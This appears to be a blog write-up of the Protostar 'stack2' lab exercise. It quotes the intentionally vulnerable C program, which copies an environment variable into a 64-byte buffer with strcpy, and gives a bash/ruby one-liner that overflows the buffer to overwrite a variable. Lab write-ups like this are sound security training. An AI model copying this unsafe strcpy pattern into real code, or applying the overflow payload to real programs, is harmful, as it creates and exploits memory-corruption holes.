$$\
$$ |
$$$$$$$$\ $$ | $$$$$$\ $$\ $$\ $$\ $$$$$$\ $$$$$$\ $$$$$$\$$$$\
\____$$ |$$ |$$ __$$\ $$ | $$ | $$ |$$ __$$\ \____$$\ $$ _$$ _$$\
$$$$ _/ $$ |$$ / $$ |$$ | $$ | $$ |$$ | \__|$$$$$$$ |$$ / $$ / $$ |
$$ _/ $$ |$$ | $$ |$$ | $$ | $$ |$$ | $$ __$$ |$$ | $$ | $$ |
$$$$$$$$\ $$ |\$$$$$$ |\$$$$$\$$$$ |$$ | $$\\$$$$$$$ |$$ | $$ | $$ |
\________|\__| \______/ \_____\____/ \__| \__|\_______|\__| \__| \__|
In this third exercise of protostar we have to overwrite, again, the variable “modified” with a concrete value in order to get the “good boy” message. This time, we must overwrite it with the value: “0x0d0a0d0a”.
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv)
{
volatile int modified;
char buffer[64];
char *variable;
variable = getenv("GREENIE");
if(variable == NULL) {
errx(1, "please set the GREENIE environment variable\n");
}
modified = 0;
strcpy(buffer, variable);
if(modified == 0x0d0a0d0a) {
printf("you have correctly modified the variable\n");
} else {
printf("Try again, you got 0x%08x\n", modified);
}
}
The particularity of this exercise is that the input of the program is not stdin. Instead, the program gets the value of an environment variable called “GREENIE”, and then it copies it to “buffer” with an insecure function: strcpy.
Taking this into account, we’re now at the same situation than in stack1, where we had to stuff 64 bytes plus 4 bytes with the wanted hex value. This time, though, we have to set an environment variable called “GREENIE” with the whole payload and.. that’s it!
As usual, we use ruby and bash to write the solution:
#!/bin/bash
export GREENIE=$(ruby -e ' puts "A"*64 + "\x0a\x0d\x0a\x0d" ') && ./stack2